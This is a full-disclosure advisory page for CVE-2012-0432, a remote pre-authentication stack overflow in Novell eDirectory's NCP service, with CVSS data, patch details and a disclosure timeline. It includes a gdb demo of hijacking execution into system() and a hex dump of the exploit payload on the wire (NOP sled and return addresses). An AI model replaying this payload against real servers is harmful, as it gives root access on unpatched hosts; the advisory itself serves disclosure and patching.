Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow

2013-01-15 / 2013-01-19
Credit: David Klein
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

===================================================================== Title: Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow. Author: David Klein (david.r.klein at 676D61696). Product: Novell NCP in eDirectory. Platform: Linux RCE, Windows (GS), Sol & AIX likely vuln. CVES: CVE-2012-0432 ===================================================================== 1. Summary: Stack Buffer Overflow in vulnerable (network) function. The vulnerable function is KeyedObjectLogin (http://bit.ly/W5IeHO). Bug is trivially exploitable on Linux due to lack of stack cookie, the vulnerable process runs as root by default, giving an attacker full control over the process in the context of uid0. Vulnerability is remotely exploitable, authentication not required. 2. Description (wiki): http://en.wikipedia.org/wiki/Novell_eDirectory 3. Solution: Install vendor patch. 'eDirectory 8.8 SP7 patch 2 6989' Download: http://download.novell.com/Download?buildid=ifVmcyYyHI8 4. Timeline: 08102012 - discovery 12102012 - PGP key link on vendors site 404's. 12102012 - requested secure contact from vendor. 06102012 - emailed SuSE sec asking if they have a contact. 18102012 - contacted NetIQ Tech Services. 26102012 - bug logged internally with Novell (785272) 06112012 - vendor contact, bug will be fixed in 88SP7 patch 2. 13122012 - patch released, only available to paying customers. 15012013 - public full disclosure. 5. Thank you: Kevin Pidd of NetIQ (Novell?) for prompt responses, andrewG for assistance especially with gdb & Linux. emp for industry contacts 6. Demo (system(), exit(), source and pcaps available on request) (gdb) break system Breakpoint 1 at 0x1607d4 (gdb) continue Continuing. [New Thread 0x44deb70 (LWP 8944)] [Switching to Thread 0x25eab70 (LWP 8897)] Breakpoint 1, 0x001607d4 in system () from /lib/libpthread.so.0 (gdb) x/4x $esp 0x1e8bba8: 0x90909090 0x90909090 0x08052d9c 0x00000000 (gdb) x/4x $ebp 0x1e8bbac: 0x90909090 0x08052d9c 0x00000000 0x90909090 (gdb) x/1i $eip => 0x1607d4 <system+4>: call 0x1565e0 <__i686.get_pc_thunk.bx> (gdb) i r eax 0xf0 240 ecx 0x8364034 137773108 edx 0x0 0 ebx 0x90909090 -1869574000 esp 0x1e8bba8 0x1e8bba8 ebp 0x1e8bbac 0x1e8bbac esi 0x14e4bef4 350535412 edi 0xf 15 eip 0x1607d4 0x1607d4 <system+4> ... (gdb) continue Continuing. Detaching after fork from child process. ... [Thread 0x25eab70 (LWP 8897) exited] Program exited with code 0220. 7. Payload on the wire: -> 00000000 44 6d 64 54 00 00 00 17 00 00 00 01 00 00 00 00 00000010 11 11 00 00 00 00 00 <- 00000000 74 4e 63 50 00 00 00 10 33 33 00 10 00 00 00 00 -> 00000017 44 6d 64 54 00 00 01 0c 00 00 00 01 00 00 00 05 00000027 22 22 01 10 00 00 17 00 a7 18 90 90 90 90 90 90 00000037 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00000047 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00000057 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00000067 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8c 26 00000077 05 08 9c 2d 05 08 00 00 00 00 90 90 90 90 00 01 00000087 9b 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 00000097 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000A7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000B7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000C7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000D7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000E7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 000000F7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 00000107 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 00000117 48 48 48 48 48 48 48 48 48 48 48 48

References:

http://bit.ly/W5IeHO
http://download.novell.com/Download?buildid=ifVmcyYyHI8
https://cxsecurity.com/issue/WLB-2013010151


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top